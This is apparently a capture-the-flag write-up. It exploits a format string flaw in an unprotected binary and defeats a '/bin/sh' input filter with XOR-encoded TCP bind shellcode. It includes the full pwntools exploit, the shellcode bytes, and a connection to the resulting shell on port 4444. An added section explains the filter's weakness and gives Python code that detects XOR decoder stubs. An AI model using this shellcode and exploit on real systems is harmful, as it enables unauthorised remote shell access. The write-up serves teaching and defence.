This binary, too, had no protections. It had a format string vulnerability, so I simply overflowed the buffer; the buffer was also located in the .bss section.
The only obstacle to pwning the binary was that it filtered our input, checking for /bin/sh or something like it. The solution was to
use XOR-encoded TCP bind shellcode:
from pwn import *

# XOR-encoded x86 TCP bind shellcode: an 18-byte decoder stub unpacks the real
# payload in place at run time, so the literal "/bin/sh" never appears in the
# bytes the input filter inspects.
shellcode = "\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5\xd3\x9e"
print "[+] Len of shellcode=%d" % len(shellcode)

# "\xeb" + chr(11) is a short jmp over the next 11 bytes (2 NOPs + "%524u" + the
# 4-byte address), so execution that lands at the start of our input in .bss goes
# straight into the shellcode. "%524u" pads the formatted output to overflow the
# buffer, and 0x804b120 (the .bss address of our input) is what the overflow
# drops on the control-flow slot (assumed here to be the saved return address).
payload = '\xeb' + chr(11) + "\x90" * 2 + "%524u" + pack(0x804b120) + shellcode

r = remote('127.0.0.1', 23456)
msg = r.recvuntil(':')  # wait for the service's prompt before sending
print msg
print "[+] Len of payload=%d" % len(payload)
r.send(payload + "\n")
r.close()

# The bind shellcode listens on port 4444; connect to it for the shell.
s = remote('127.0.0.1', 4444)
s.interactive()
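The defender's lesson in this writeup is that a substring filter for "/bin/sh" is not a mitigation: the encoded bytes never contain it, yet they are trivially recognisable as machine code. The following Python is an added example, not part of the original post; it takes the first 32 bytes of the shellcode above as a constructed sample and contrasts the naive filter with two structural checks (non-printable bytes and the jmp/pop/xor-al decoder stub, whose key is recovered from the `xor al, imm8` instruction). The `SAMPLE` constant, offsets and function names are assumptions of this example.

```python
import re

# Constructed sample: the first 32 bytes of the payload on this page, i.e. the
# 18-byte XOR decoder stub, the 7-byte jmp/call trampoline that hands the stub
# the address of the encoded body, and the first 7 encoded bytes.
SAMPLE = (b"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34\x1e\x88\x03\x43\x66\x49\x75\xf5"
          b"\xeb\x05\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f\x45\x2f")

# jmp short / pop ebx / ... / xor al, imm8 / ... / jnz back: the usual shape of a
# single-byte XOR decoder. The captured group is the key byte.
DECODER_STUB = re.compile(rb"\xeb.\x5b.{0,8}?\x34(.).{0,8}?\x75.", re.DOTALL)


def naive_filter(data: bytes) -> bool:
    """The kind of check the target relied on: a literal substring match."""
    return b"/bin/sh" in data


def has_nonprintable(data: bytes) -> bool:
    """A format string or command line should be text; raw machine code is not."""
    return any(b < 0x20 or b > 0x7E for b in data if b not in b"\t\r\n")


def find_xor_decoder(data: bytes):
    """Return (stub_offset, key) if a single-byte XOR decoder stub is present."""
    m = DECODER_STUB.search(data)
    if m is None:
        return None
    return m.start(), m.group(1)[0]


def decode_body(data: bytes, key: int, start: int) -> bytes:
    """Undo the stub's XOR so an analyst can see what the filter never saw."""
    return bytes(b ^ key for b in data[start:])


def inspect(data: bytes) -> dict:
    """Compare the naive string filter with structural checks on the same input."""
    hit = find_xor_decoder(data)
    report = {
        "naive_filter_blocks": naive_filter(data),
        "nonprintable_bytes": has_nonprintable(data),
        "xor_decoder": hit,
    }
    if hit is not None:
        # In this sample the encoded body starts 25 bytes after the stub (18-byte
        # stub + 7-byte trampoline). Decoded, it begins "push 0x66; pop eax"
        # (6a 66 58): the socketcall setup that opens TCP bind shellcode.
        report["decoded_head"] = decode_body(data, hit[1], hit[0] + 25)
    return report


if __name__ == "__main__":
    for key, value in inspect(SAMPLE).items():
        print(key, value)
```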